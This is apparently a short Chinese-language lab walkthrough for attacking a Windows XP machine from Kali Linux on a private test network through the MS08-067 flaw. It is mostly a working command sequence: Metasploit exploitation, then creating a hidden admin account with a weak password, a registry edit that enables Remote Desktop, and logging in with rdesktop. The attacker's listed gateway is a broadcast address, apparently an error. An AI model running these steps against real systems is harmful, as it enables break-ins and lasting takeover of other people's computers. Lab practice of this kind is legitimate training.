攻击机:kali 目标机:win xp
攻击机: ip:192.168.136.131 网关:192.168.136.255
目标机: ip:192.168.136.138 网关:192.168.136.2
一、验证双方是否可以互相ping通
二、
1、msfconsole
2、search 08-067
3、use 0
4、set rhosts 192.168.136.138
5、run
攻击成功
1、shell
2、在目标机上创建一个新的用户:net user root 123456 /add
3、提权:net localgroup administrators root /add
4、打开远程连接端口3389:
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
5、netstat -an 出现下图中的3389端口表示成功
6、rdesktop 192.168.136.138
输入账号密码,进入对方电脑